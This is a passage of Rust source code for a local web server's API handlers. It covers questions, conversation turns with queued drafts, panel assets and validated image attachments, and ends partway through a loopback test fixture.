3336 State(ui): State<Arc<Ui>>,
3337 Path(id): Path<String>,
3338 body: std::result::Result<Json<NewSay>, JsonRejection>,
3339) -> ApiResult<Json<QuestionView>> {
3340 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3341 blocking(move || {
3342 let id = resolve_question(&ui.questions, &id)?;
3343 let mut q = ui
3344 .questions
3345 .get(&id)
3346 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3347 if !q.status.open() {
3348 return Err(ApiError::conflict(format!(
3352 "question {} is already {}",
3353 q.short(),
3354 q.status.as_str()
3355 )));
3356 }
3357 q.say(body.body).map_err(ApiError::bad_request_from)?;
3360 ui.questions.put(&mut q)?;
3361 Ok(Json(QuestionView::from(q)))
3362 })
3363 .await
3364}
3365
3366fn resolve_question(store: &Questions, id: &str) -> ApiResult<String> {
3368 if store.path_of(id).is_file() {
3369 return Ok(id.to_owned());
3370 }
3371 pick(
3372 store.list().into_iter().map(|q| q.id).collect(),
3373 id,
3374 "question",
3375 )
3376}
3377
3378async fn question_panel(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Response> {
3393 blocking(move || {
3394 let id = resolve_question(&ui.questions, &id)?;
3395 let Some(html) = ui.questions.panel_html(&id) else {
3396 return Err(ApiError::not_found(format!("question {id} has no panel")));
3397 };
3398 Ok(panel_response(
3399 "text/html; charset=utf-8",
3400 false,
3401 html.into_bytes(),
3402 ))
3403 })
3404 .await
3405}
3406
3407async fn question_asset(
3435 State(ui): State<Arc<Ui>>,
3436 Path((id, name)): Path<(String, String)>,
3437) -> ApiResult<Response> {
3438 if !crate::ask::valid_asset_name(&name) {
3441 return Err(ApiError::bad_request(format!(
3442 "`{name}` is not a usable asset name"
3443 )));
3444 }
3445 blocking(move || {
3446 let id = resolve_question(&ui.questions, &id)?;
3447 let asset = ui
3448 .questions
3449 .panel_asset(&id, &name)
3450 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
3451 let Some(bytes) = asset else {
3452 return Err(ApiError::not_found(format!(
3453 "question {id} has no asset `{name}`"
3454 )));
3455 };
3456 Ok(panel_response(
3457 asset_content_type(&name),
3458 is_svg(&name),
3459 bytes,
3460 ))
3461 })
3462 .await
3463}
3464
3465fn asset_content_type(name: &str) -> &'static str {
3478 match extension(name).as_deref() {
3479 Some("png") => "image/png",
3480 Some("jpg" | "jpeg") => "image/jpeg",
3481 Some("gif") => "image/gif",
3482 Some("webp") => "image/webp",
3483 Some("svg") => "image/svg+xml",
3484 Some("css") => "text/css; charset=utf-8",
3485 Some("txt") => "text/plain; charset=utf-8",
3486 _ => "application/octet-stream",
3487 }
3488}
3489
3490fn is_svg(name: &str) -> bool {
3493 extension(name).as_deref() == Some("svg")
3494}
3495
3496fn extension(name: &str) -> Option<String> {
3498 name.rsplit_once('.')
3499 .map(|(_, ext)| ext.to_ascii_lowercase())
3500}
3501
3502fn panel_response(content_type: &'static str, download: bool, body: Vec<u8>) -> Response {
3519 let mut res = (
3520 [
3521 (header::CONTENT_TYPE, content_type),
3522 (header::CONTENT_SECURITY_POLICY, PANEL_CSP),
3523 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
3524 (header::REFERRER_POLICY, "no-referrer"),
3525 ],
3526 body,
3527 )
3528 .into_response();
3529 if download {
3530 res.headers_mut().insert(
3531 header::CONTENT_DISPOSITION,
3532 HeaderValue::from_static("attachment"),
3533 );
3534 }
3535 res
3536}
3537
3538#[derive(Debug, Serialize)]
3544struct TalkView {
3545 #[serde(flatten)]
3546 talk: Talk,
3547 turn_bodies_md: Vec<Vec<md::Node>>,
3548 thinking: bool,
3556}
3557
3558impl TalkView {
3559 fn new(talk: Talk, thinking: bool) -> Self {
3560 let turn_bodies_md = talk
3561 .turns
3562 .iter()
3563 .map(|turn| md::to_nodes(&turn.body, &md::ImageBase::None))
3564 .collect();
3565 Self {
3566 turn_bodies_md,
3567 thinking,
3568 talk,
3569 }
3570 }
3571}
3572
3573#[derive(Debug, Serialize)]
3578struct TalkDetailView {
3579 #[serde(flatten)]
3580 view: TalkView,
3581 tasks: Vec<TaskView>,
3582}
3583
3584async fn talks_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TalkView>>> {
3589 blocking(move || {
3590 Ok(Json(
3591 ui.talks
3592 .list()
3593 .into_iter()
3594 .map(|talk| {
3595 let thinking = ui.is_thinking(&talk.id);
3596 TalkView::new(talk, thinking)
3597 })
3598 .collect(),
3599 ))
3600 })
3601 .await
3602}
3603
3604#[derive(Debug, Default, Deserialize)]
3609#[serde(default)]
3610struct NewTalk {
3611 agent: Option<String>,
3612 repo: Option<PathBuf>,
3613}
3614
3615async fn talk_post(
3618 State(ui): State<Arc<Ui>>,
3619 body: std::result::Result<Json<NewTalk>, JsonRejection>,
3620) -> ApiResult<impl IntoResponse> {
3621 let body = match body {
3625 Ok(Json(body)) => body,
3626 Err(JsonRejection::MissingJsonContentType(_)) => NewTalk::default(),
3627 Err(e) => return Err(ApiError::bad_request(e.body_text())),
3628 };
3629 let repo = body.repo.clone().unwrap_or_else(|| ui.repo.clone());
3630 let cfg = config_for(&repo).await?;
3631 let view = blocking(move || {
3632 let talk = talk::begin(&ui.talks, &cfg, repo, body.agent.as_deref())?;
3633 let thinking = ui.is_thinking(&talk.id);
3634 Ok(TalkView::new(talk, thinking))
3635 })
3636 .await?;
3637 Ok((StatusCode::CREATED, Json(view)))
3638}
3639
3640async fn talk_detail(
3642 State(ui): State<Arc<Ui>>,
3643 Path(id): Path<String>,
3644) -> ApiResult<Json<TalkDetailView>> {
3645 blocking(move || {
3646 let id = resolve_talk(&ui.talks, &id)?;
3647 let talk = ui.talks.get(&id)?;
3648 let thinking = ui.is_thinking(&talk.id);
3649 let tasks = talk::tasks_of(&ui.queue, &talk.id)
3650 .into_iter()
3651 .map(TaskView::from)
3652 .collect();
3653 Ok(Json(TalkDetailView {
3654 view: TalkView::new(talk, thinking),
3655 tasks,
3656 }))
3657 })
3658 .await
3659}
3660
3661#[derive(Debug, Default, Deserialize)]
3667#[serde(default, deny_unknown_fields)]
3668struct NewTalkTurn {
3669 text: String,
3670 attachments: Vec<String>,
3671}
3672
3673#[derive(Debug, Deserialize)]
3674#[serde(deny_unknown_fields)]
3675struct EditTalkPending {
3676 text: String,
3677 expected_text: String,
3678 expected_attachments: Vec<String>,
3679}
3680
3681#[derive(Debug, Deserialize)]
3682#[serde(deny_unknown_fields)]
3683struct ClearTalkPending {
3684 expected_text: String,
3685 expected_attachments: Vec<String>,
3686}
3687
3688async fn talk_say(
3700 State(ui): State<Arc<Ui>>,
3701 Path(id): Path<String>,
3702 body: std::result::Result<Json<NewTalkTurn>, JsonRejection>,
3703) -> ApiResult<(StatusCode, Json<TalkView>)> {
3704 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3705 if body.text.trim().is_empty() && body.attachments.is_empty() {
3706 return Err(ApiError::bad_request("say something"));
3707 }
3708
3709 let id = {
3710 let ui = Arc::clone(&ui);
3711 let asked = id.clone();
3712 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3713 };
3714 {
3718 let ui = Arc::clone(&ui);
3719 let id = id.clone();
3720 blocking(move || {
3721 let talk = ui.talks.get(&id)?;
3722 if !talk.status.open() {
3723 return Err(ApiError::conflict(format!(
3724 "talk {} is {} and takes no more turns",
3725 talk.short(),
3726 talk.status.as_str()
3727 )));
3728 }
3729 Ok(())
3730 })
3731 .await?;
3732 }
3733
3734 let attachments = {
3739 let ui = Arc::clone(&ui);
3740 let id = id.clone();
3741 let ids = body.attachments.clone();
3742 blocking(move || {
3743 ids.into_iter()
3744 .map(|att_id| {
3745 ui.talks.attachment_meta(&id, &att_id)?.ok_or_else(|| {
3746 ApiError::bad_request(format!("unknown attachment `{att_id}`"))
3747 })
3748 })
3749 .collect::<ApiResult<Vec<talk::Attachment>>>()
3750 })
3751 .await?
3752 };
3753
3754 let start = {
3759 let ui = Arc::clone(&ui);
3760 let id = id.clone();
3761 blocking(move || ui.begin_talk_turn_unless_pending(&id)).await?
3762 };
3763 let turn_guard = match start {
3764 TalkTurnStart::Claimed(turn_guard) => turn_guard,
3765 TalkTurnStart::Pending => {
3766 return Err(ApiError::conflict(
3767 "a queued draft is waiting; resume it, edit it, or clear it before sending another message",
3768 ));
3769 }
3770 TalkTurnStart::Busy => {
3771 let (tx, rx) = tokio::sync::oneshot::channel();
3787 tokio::spawn({
3788 let ui = Arc::clone(&ui);
3789 let id = id.clone();
3790 let said = body.text.clone();
3791 async move {
3792 let written = blocking({
3793 let ui = Arc::clone(&ui);
3794 let id = id.clone();
3795 move || {
3796 let mut talk = ui.talks.get(&id)?;
3797 #[cfg(test)]
3802 if let Some(gate) = ui
3803 .busy_queue_gate
3804 .lock()
3805 .unwrap_or_else(PoisonError::into_inner)
3806 .take()
3807 {
3808 let _ = gate.reached.send(());
3809 let _ = gate.release.recv();
3810 }
3811 if let Err(error) =
3812 talk::queue(&mut talk, &ui.talks, &said, attachments)
3813 {
3814 if let Ok(fresh) = ui.talks.get(&id) {
3815 if !fresh.status.open() {
3816 return Err(ApiError::conflict(format!(
3817 "talk {} is {} and takes no more turns",
3818 fresh.short(),
3819 fresh.status.as_str()
3820 )));
3821 }
3822 }
3823 return Err(ApiError::from(error));
3824 }
3825 let claim = match ui.begin_queued_talk_turn(&id)? {
3836 Some(turn_guard) => {
3837 let (cfg, _) = Config::discover(&talk.repo, None)?;
3838 Some((talk.clone(), cfg, turn_guard))
3839 }
3840 None => None,
3841 };
3842 let thinking = ui.is_thinking(&id);
3843 Ok((TalkView::new(talk, thinking), claim))
3844 }
3845 })
3846 .await;
3847 let (view, reclaimed) = match written {
3848 Ok(pair) => pair,
3849 Err(e) => {
3850 let _ = tx.send(Err(e));
3855 return;
3856 }
3857 };
3858 let _ = tx.send(Ok(view));
3861 if let Some((talk, cfg, turn_guard)) = reclaimed {
3862 let talks = ui.talks.clone();
3863 drain_loop(talk, talks, cfg, id, turn_guard).await;
3864 }
3865 }
3866 });
3867 let view = rx
3868 .await
3869 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
3870 return Ok((StatusCode::ACCEPTED, Json(view)));
3871 }
3872 };
3873
3874 let (talk, cfg) = {
3875 let ui = Arc::clone(&ui);
3876 let id = id.clone();
3877 blocking(move || {
3878 let talk = ui.talks.get(&id)?;
3879 let (cfg, _) = Config::discover(&talk.repo, None)?;
3880 Ok((talk, cfg))
3881 })
3882 .await?
3883 };
3884
3885 let talks = ui.talks.clone();
3886 let (tx, rx) = tokio::sync::oneshot::channel();
3901 tokio::spawn({
3902 let ui = Arc::clone(&ui);
3903 let talks = talks.clone();
3904 let id = id.clone();
3905 let said = body.text.clone();
3906 let mut talk = talk.clone();
3907 async move {
3908 let recorded = blocking({
3909 let talks = talks.clone();
3910 move || {
3911 if let Err(error) = talk::record(&mut talk, &talks, &said, attachments) {
3912 if let Ok(fresh) = talks.get(&talk.id) {
3913 if !fresh.status.open() {
3914 return Err(ApiError::conflict(format!(
3915 "talk {} is {} and takes no more turns",
3916 fresh.short(),
3917 fresh.status.as_str()
3918 )));
3919 }
3920 }
3921 return Err(ApiError::from(error));
3922 }
3923 Ok((said.trim().to_owned(), talk))
3929 }
3930 })
3931 .await;
3932 let (text, mut talk) = match recorded {
3933 Ok(pair) => pair,
3934 Err(e) => {
3935 let _ = tx.send(Err(e));
3939 return;
3940 }
3941 };
3942 let queued = talk.clone();
3943 let thinking = ui.is_thinking(&id);
3944 let _ = tx.send(Ok((queued, thinking)));
3947
3948 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &text).await {
3949 tracing::warn!("talk {id} turn failed: {e:#}");
3953 }
3954 drain_loop(talk, talks, cfg, id, turn_guard).await;
3957 }
3958 });
3959
3960 let (queued, thinking) = rx
3961 .await
3962 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
3963
3964 Ok((StatusCode::ACCEPTED, Json(TalkView::new(queued, thinking))))
3966}
3967
3968async fn talk_pending_resume(
3972 State(ui): State<Arc<Ui>>,
3973 Path(id): Path<String>,
3974) -> ApiResult<(StatusCode, Json<TalkView>)> {
3975 let id = {
3976 let ui = Arc::clone(&ui);
3977 let asked = id.clone();
3978 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3979 };
3980 let Some(turn_guard) = ui.begin_talk_turn(&id)? else {
3981 return Err(ApiError::conflict(
3982 "a talk turn is already running; the queued draft will be handled by it",
3983 ));
3984 };
3985 let (talk, cfg) = {
3986 let ui = Arc::clone(&ui);
3987 let id = id.clone();
3988 blocking(move || {
3989 let talk = ui.talks.get(&id)?;
3990 if !talk.status.open() {
3991 return Err(ApiError::conflict(format!(
3992 "talk {} is {} and takes no more turns",
3993 talk.short(),
3994 talk.status.as_str()
3995 )));
3996 }
3997 if talk.pending.is_empty() && talk.pending_attachments.is_empty() {
3998 return Err(ApiError::conflict("there is no queued draft to resume"));
3999 }
4000 let (cfg, _) = Config::discover(&talk.repo, None)?;
4001 Ok((talk, cfg))
4002 })
4003 .await?
4004 };
4005 let view = TalkView::new(talk.clone(), true);
4006 let talks = ui.talks.clone();
4007 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4008 Ok((StatusCode::ACCEPTED, Json(view)))
4009}
4010
4011async fn drain_loop(mut talk: Talk, talks: Talks, cfg: Config, id: String, turn: TalkTurnGuard) {
4027 let live_set = Arc::clone(&turn.turns);
4028 let mut turn = Some(turn);
4036 loop {
4037 let observed = live_set
4041 .lock()
4042 .unwrap_or_else(PoisonError::into_inner)
4043 .queued
4044 .get(&id)
4045 .copied()
4046 .unwrap_or(0);
4047 let drained = blocking({
4048 let talks = talks.clone();
4049 move || {
4050 let result = talk::drain(&mut talk, &talks);
4051 Ok((talk, result))
4052 }
4053 })
4054 .await;
4055 let (next_talk, result) = match drained {
4056 Ok(drained) => drained,
4057 Err(e) => {
4058 tracing::warn!(
4059 status = %e.status,
4060 message = %e.message,
4061 "talk {id} could not start queued-text drain"
4062 );
4063 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4064 turn.take()
4065 .expect("held for the whole loop until released here")
4066 .release(&mut live);
4067 break;
4068 }
4069 };
4070 talk = next_talk;
4071 let drained = match result {
4072 Ok(Some(drained)) => drained,
4073 Ok(None) => {
4074 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4075 if live.queued.get(&id).copied().unwrap_or(0) != observed {
4076 continue;
4077 }
4078 turn.take()
4079 .expect("held for the whole loop until released here")
4080 .release(&mut live);
4081 break;
4082 }
4083 Err(e) => {
4084 tracing::warn!("talk {id} could not drain queued text: {e:#}");
4085 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4086 turn.take()
4087 .expect("held for the whole loop until released here")
4088 .release(&mut live);
4089 break;
4090 }
4091 };
4092 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &drained).await {
4093 tracing::warn!("talk {id} turn failed: {e:#}");
4094 }
4095 }
4096}
4097
4098async fn talk_pending_clear(
4100 State(ui): State<Arc<Ui>>,
4101 Path(id): Path<String>,
4102 body: std::result::Result<Json<ClearTalkPending>, JsonRejection>,
4103) -> ApiResult<Json<TalkView>> {
4104 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4105 blocking(move || {
4106 let id = resolve_talk(&ui.talks, &id)?;
4107 let mut talk = ui.talks.get(&id)?;
4108 if !talk.status.open() {
4109 return Err(ApiError::conflict(format!(
4110 "talk {} is {} and takes no more turns",
4111 talk.short(),
4112 talk.status.as_str()
4113 )));
4114 }
4115 if !talk::clear_pending_if_matches(
4116 &mut talk,
4117 &ui.talks,
4118 &body.expected_text,
4119 &body.expected_attachments,
4120 )? {
4121 return Err(ApiError::conflict(
4122 "queued message changed; reload it before clearing",
4123 ));
4124 }
4125 let thinking = ui.is_thinking(&talk.id);
4126 Ok(Json(TalkView::new(talk, thinking)))
4127 })
4128 .await
4129}
4130
4131async fn talk_pending_edit(
4135 State(ui): State<Arc<Ui>>,
4136 Path(id): Path<String>,
4137 body: std::result::Result<Json<EditTalkPending>, JsonRejection>,
4138) -> ApiResult<Json<TalkView>> {
4139 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4140 let (view, reclaimed) = blocking({
4141 let ui = Arc::clone(&ui);
4142 move || {
4143 let id = resolve_talk(&ui.talks, &id)?;
4144 let mut talk = ui.talks.get(&id)?;
4145 if !talk.status.open() {
4146 return Err(ApiError::conflict(format!(
4147 "talk {} is {} and takes no more turns",
4148 talk.short(),
4149 talk.status.as_str()
4150 )));
4151 }
4152 if !talk::edit_pending_text(
4153 &mut talk,
4154 &ui.talks,
4155 &body.text,
4156 &body.expected_text,
4157 &body.expected_attachments,
4158 )? {
4159 return Err(ApiError::conflict(
4160 "queued message changed; reload it before editing",
4161 ));
4162 }
4163 let claim = match ui.begin_queued_talk_turn(&id)? {
4164 Some(turn_guard) => {
4165 let (cfg, _) = Config::discover(&talk.repo, None)?;
4166 Some((talk.clone(), cfg, id.clone(), turn_guard))
4167 }
4168 None => None,
4169 };
4170 let thinking = ui.is_thinking(&id);
4171 Ok((TalkView::new(talk, thinking), claim))
4172 }
4173 })
4174 .await?;
4175 if let Some((talk, cfg, id, turn_guard)) = reclaimed {
4176 let talks = ui.talks.clone();
4177 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4178 }
4179 Ok(Json(view))
4180}
4181
4182async fn talk_close(
4184 State(ui): State<Arc<Ui>>,
4185 Path(id): Path<String>,
4186) -> ApiResult<Json<TalkView>> {
4187 blocking(move || {
4188 let id = resolve_talk(&ui.talks, &id)?;
4189 let mut talk = ui.talks.get(&id)?;
4190 talk::close(&mut talk, &ui.talks)?;
4191 let thinking = ui.is_thinking(&talk.id);
4192 Ok(Json(TalkView::new(talk, thinking)))
4193 })
4194 .await
4195}
4196
4197async fn talk_reopen(
4199 State(ui): State<Arc<Ui>>,
4200 Path(id): Path<String>,
4201) -> ApiResult<Json<TalkView>> {
4202 blocking(move || {
4203 let id = resolve_talk(&ui.talks, &id)?;
4204 let mut talk = ui.talks.get(&id)?;
4205 talk::reopen(&mut talk, &ui.talks)?;
4206 let thinking = ui.is_thinking(&talk.id);
4207 Ok(Json(TalkView::new(talk, thinking)))
4208 })
4209 .await
4210}
4211
4212async fn talk_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
4222 blocking(move || {
4223 let id = resolve_talk(&ui.talks, &id)?;
4224 ui.talks.remove(&id)?;
4225 Ok(StatusCode::NO_CONTENT)
4226 })
4227 .await
4228}
4229
4230fn resolve_talk(store: &Talks, id: &str) -> ApiResult<String> {
4232 pick(store.list().into_iter().map(|t| t.id).collect(), id, "talk")
4233}
4234
4235async fn talk_attachment_post(
4238 State(ui): State<Arc<Ui>>,
4239 Path(id): Path<String>,
4240 headers: HeaderMap,
4241 body: Bytes,
4242) -> ApiResult<(StatusCode, Json<talk::Attachment>)> {
4243 let mime = validate_attachment(&headers, &body)?;
4244 let name = filename_header(&headers);
4245 let data = body.to_vec();
4246 blocking(move || {
4247 let id = resolve_talk(&ui.talks, &id)?;
4248 let att = ui.talks.put_attachment(&id, mime, &name, &data)?;
4249 Ok((StatusCode::CREATED, Json(att)))
4250 })
4251 .await
4252}
4253
4254async fn talk_attachment_get(
4257 State(ui): State<Arc<Ui>>,
4258 Path((id, att)): Path<(String, String)>,
4259) -> ApiResult<Response> {
4260 blocking(move || {
4261 let id = resolve_talk(&ui.talks, &id)?;
4262 let Some((meta, data)) = ui.talks.read_attachment(&id, &att)? else {
4263 return Err(ApiError::not_found(format!(
4264 "talk {id} has no attachment `{att}`"
4265 )));
4266 };
4267 Ok(attachment_response(&meta.mime, data))
4268 })
4269 .await
4270}
4271
4272fn validate_attachment(headers: &HeaderMap, data: &[u8]) -> ApiResult<&'static str> {
4283 if data.len() > ATTACHMENT_MAX_BYTES {
4284 return Err(ApiError::bad_request(format!(
4285 "attachment is {} bytes, over the {} MiB limit",
4286 data.len(),
4287 ATTACHMENT_MAX_BYTES / (1024 * 1024)
4288 ))
4289 .with_status(StatusCode::PAYLOAD_TOO_LARGE));
4290 }
4291 if data.is_empty() {
4292 return Err(ApiError::bad_request("attachment is empty"));
4293 }
4294 let declared = declared_mime(headers)?;
4295 match sniffed_mime(data) {
4296 Some(sniffed) if sniffed == declared => Ok(declared),
4297 Some(sniffed) => Err(ApiError::bad_request(format!(
4298 "Content-Type said `{declared}` but the file's own bytes look like `{sniffed}`"
4299 ))),
4300 None => Err(ApiError::bad_request(
4301 "the file's bytes do not match any accepted image format",
4302 )),
4303 }
4304}
4305
4306fn declared_mime(headers: &HeaderMap) -> ApiResult<&'static str> {
4310 let raw = headers
4311 .get(header::CONTENT_TYPE)
4312 .and_then(|v| v.to_str().ok())
4313 .unwrap_or("")
4314 .split(';')
4315 .next()
4316 .unwrap_or("")
4317 .trim()
4318 .to_ascii_lowercase();
4319 ATTACHMENT_MIME_WHITELIST
4320 .iter()
4321 .find(|&&m| m == raw)
4322 .copied()
4323 .ok_or_else(|| {
4324 if raw == "image/svg+xml" {
4325 ApiError::bad_request(
4326 "SVG is not accepted: it can carry active content (e.g. a <script>), \
4327 not just a picture",
4328 )
4329 } else if raw.is_empty() {
4330 ApiError::bad_request("Content-Type is required for an attachment upload")
4331 } else {
4332 ApiError::bad_request(format!(
4333 "`{raw}` is not an accepted attachment type; use image/png, image/jpeg, \
4334 image/gif or image/webp"
4335 ))
4336 }
4337 })
4338}
4339
4340fn sniffed_mime(data: &[u8]) -> Option<&'static str> {
4343 if data.starts_with(b"\x89PNG\r\n\x1a\n") {
4344 Some("image/png")
4345 } else if data.starts_with(b"\xff\xd8\xff") {
4346 Some("image/jpeg")
4347 } else if data.starts_with(b"GIF87a") || data.starts_with(b"GIF89a") {
4348 Some("image/gif")
4349 } else if data.len() >= 12 && &data[0..4] == b"RIFF" && &data[8..12] == b"WEBP" {
4350 Some("image/webp")
4351 } else {
4352 None
4353 }
4354}
4355
4356fn filename_header(headers: &HeaderMap) -> String {
4362 headers
4363 .get(FILENAME_HEADER)
4364 .and_then(|v| v.to_str().ok())
4365 .map(str::trim)
4366 .filter(|s| !s.is_empty())
4367 .unwrap_or("attachment")
4368 .to_owned()
4369}
4370
4371fn attachment_response(mime: &str, body: Vec<u8>) -> Response {
4378 let content_type = ATTACHMENT_MIME_WHITELIST
4379 .iter()
4380 .find(|&&m| m == mime)
4381 .copied()
4382 .unwrap_or("application/octet-stream");
4383 (
4384 [
4385 (header::CONTENT_TYPE, content_type),
4386 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
4387 ],
4388 body,
4389 )
4390 .into_response()
4391}
4392
4393async fn config_for(repo: &FsPath) -> ApiResult<Config> {
4401 let repo = repo.to_path_buf();
4402 blocking(move || {
4403 let (cfg, _) = Config::discover(&repo, None)?;
4404 Ok(cfg)
4405 })
4406 .await
4407}
4408
4409fn pick(ids: Vec<String>, prefix: &str, what: &str) -> ApiResult<String> {
4415 let mut hits = ids
4416 .into_iter()
4417 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix));
4418 match (hits.next(), hits.next()) {
4419 (Some(one), None) => Ok(one),
4420 (None, _) => Err(ApiError::not_found(format!("no {what} matches `{prefix}`"))),
4421 (Some(a), Some(b)) => Err(ApiError::bad_request(format!(
4422 "`{prefix}` matches more than one {what}, including {a} and {b}"
4423 ))),
4424 }
4425}
4426
4427#[cfg(test)]
4428mod tests {
4429 use pretty_assertions::assert_eq;
4430 use serde_json::Value;
4431 use tempfile::TempDir;
4432 use tokio::io::{AsyncReadExt as _, AsyncWriteExt as _};
4433
4434 use super::*;
4435 use crate::config::Config;
4436 use crate::queue::{Source, TaskStatus};
4437
4438 const SETTLE_STEPS: usize = 3_000;
4449
4450 struct Fixture {
4456 home: TempDir,
4457 addr: SocketAddr,
4458 }
4459
4460 impl Fixture {
4461 async fn start() -> Self {
4462 Self::with_loop(launch_idle).await
4463 }
4464
4465 async fn with_loop(launch: Launch) -> Self {
4467 let home = TempDir::new().expect("temp home");
4468 let addr = Self::serve(home.path(), PathBuf::from("/repo/magi"), launch).await;
4469 Self { home, addr }
4470 }
4471
4472 async fn with_repo(repo: PathBuf) -> Self {
4476 let home = TempDir::new().expect("temp home");
4477 let addr = Self::serve(home.path(), repo, launch_idle).await;
4478 Self { home, addr }
4479 }
4480
4481 async fn serve(home: &FsPath, repo: PathBuf, launch: Launch) -> SocketAddr {
4482 let queue = Queue::at(home.join("queue"));
4483 let runs = home.join("runs");
4484 std::fs::create_dir_all(&runs).expect("runs dir");
4485 let worktrees = home.join("wt").join("magi");
4486 std::fs::create_dir_all(&worktrees).expect("worktrees dir");
4487 let ui = Ui::new(
4488 queue,
4489 Questions::at(home.join("questions")),
4490 Talks::at(home.join("talks")),
4491 runs,
4492 home.to_path_buf(),
4493 repo,
4494 )
4495 .with_worktrees_root(worktrees)
4496 .with_launch(launch);
4497 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
4498 .await
4499 .expect("bind loopback");
4500 let addr = listener.local_addr().expect("local addr");
4501 tokio::spawn(async move {
4502 let _ = axum::serve(listener, ui.router()).await;
4503 });
4504 addr
4505 }
4506
4507 fn queue(&self) -> Queue {
4508 Queue::at(self.home.path().join("queue"))
4509 }
4510
4511 fn questions(&self) -> Questions {
4512 Questions::at(self.home.path().join("questions"))
4513 }
4514
4515 fn talks(&self) -> Talks {
4516 Talks::at(self.home.path().join("talks"))
4517 }
4518
4519 fn runs(&self) -> PathBuf {
4520 self.home.path().join("runs")
4521 }
4522
4523 async fn get(&self, path: &str) -> Res {
4524 request(self.addr, "GET", path, None).await
4525 }
4526
4527 async fn head(&self, path: &str) -> Res {
4532 request(self.addr, "HEAD", path, None).await
4533 }
4534
4535 async fn post(&self, path: &str, body: Option<&str>) -> Res {
4536 request(self.addr, "POST", path, body).await
4537 }
4538
4539 async fn get_with(&self, path: &str, extra: &[(&str, &str)]) -> Res {
4540 request_with(self.addr, "GET", path, None, extra).await
4541 }
4542
4543 async fn delete(&self, path: &str) -> Res {
4544 request(self.addr, "DELETE", path, None).await
4545 }
4546
4547 async fn post_bytes(&self, path: &str, headers: &[(&str, &str)], body: &[u8]) -> Res {
4549 request_bytes(self.addr, path, headers, body).await
4550 }
4551 }
4552
4553 struct Res {
4554 status: u16,
4555 headers: String,
4556 head: String,
4561 body: String,
4562 bytes: Vec<u8>,
4566 }
4567
4568 impl Res {
4569 fn json(&self) -> Value {
4570 serde_json::from_str(&self.body)
4571 .unwrap_or_else(|e| panic!("body is not json ({e}): {}", self.body))
4572 }
4573
4574 fn header(&self, name: &str) -> Option<&str> {
4576 self.head.lines().find_map(|line| {
4577 let (key, value) = line.split_once(':')?;
4578 key.trim()
4579 .eq_ignore_ascii_case(name)
4580 .then(|| value.trim_start().trim_end_matches('\r'))
4581 })
4582 }
4583 }
4584
4585 async fn request(addr: SocketAddr, method: &str, path: &str, body: Option<&str>) -> Res {
4588 request_with(addr, method, path, body, &[]).await
4589 }
4590
4591 async fn request_with(
4595 addr: SocketAddr,
4596 method: &str,
4597 path: &str,
4598 body: Option<&str>,
4599 extra: &[(&str, &str)],
4600 ) -> Res {
4601 let mut head = format!("{method} {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4602 for (name, value) in extra {
4603 head.push_str(&format!("{name}: {value}\r\n"));
4604 }
4605 if let Some(body) = body {
4606 head.push_str("Content-Type: application/json\r\n");
4607 head.push_str(&format!("Content-Length: {}\r\n", body.len()));
4608 }
4609 head.push_str("\r\n");
4610 if let Some(body) = body {
4611 head.push_str(body);
4612 }
4613 let mut socket = tokio::net::TcpStream::connect(addr)
4614 .await
4615 .expect("connect to the test server");
4616 socket
4617 .write_all(head.as_bytes())
4618 .await
4619 .expect("write request");
4620 let mut raw = Vec::new();
4621 socket.read_to_end(&mut raw).await.expect("read response");
4622 let split = raw
4625 .windows(4)
4626 .position(|w| w == b"\r\n\r\n")
4627 .expect("a header block");
4628 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4629 let bytes = raw[split + 4..].to_vec();
4630 let status = head
4631 .lines()
4632 .next()
4633 .and_then(|line| line.split_whitespace().nth(1))
4634 .and_then(|code| code.parse().ok())
4635 .expect("a status line");
4636 Res {
4637 status,
4638 headers: head.to_lowercase(),
4639 head,
4640 body: String::from_utf8_lossy(&bytes).into_owned(),
4641 bytes,
4642 }
4643 }
4644
4645 async fn request_bytes(
4651 addr: SocketAddr,
4652 path: &str,
4653 headers: &[(&str, &str)],
4654 body: &[u8],
4655 ) -> Res {
4656 let mut head = format!("POST {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4657 for (name, value) in headers {
4658 head.push_str(&format!("{name}: {value}\r\n"));
4659 }
4660 head.push_str(&format!("Content-Length: {}\r\n\r\n", body.len()));
4661 let mut socket = tokio::net::TcpStream::connect(addr)
4662 .await
4663 .expect("connect to the test server");
4664 socket
4665 .write_all(head.as_bytes())
4666 .await
4667 .expect("write request head");
4668 socket.write_all(body).await.expect("write request body");
4669 let mut raw = Vec::new();
4670 socket.read_to_end(&mut raw).await.expect("read response");
4671 let split = raw
4672 .windows(4)
4673 .position(|w| w == b"\r\n\r\n")
4674 .expect("a header block");
4675 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4676 let bytes = raw[split + 4..].to_vec();
4677 let status = head
4678 .lines()
4679 .next()
4680 .and_then(|line| line.split_whitespace().nth(1))
4681 .and_then(|code| code.parse().ok())
4682 .expect("a status line");
4683 Res {
4684 status,
4685 headers: head.to_lowercase(),
4686 head,
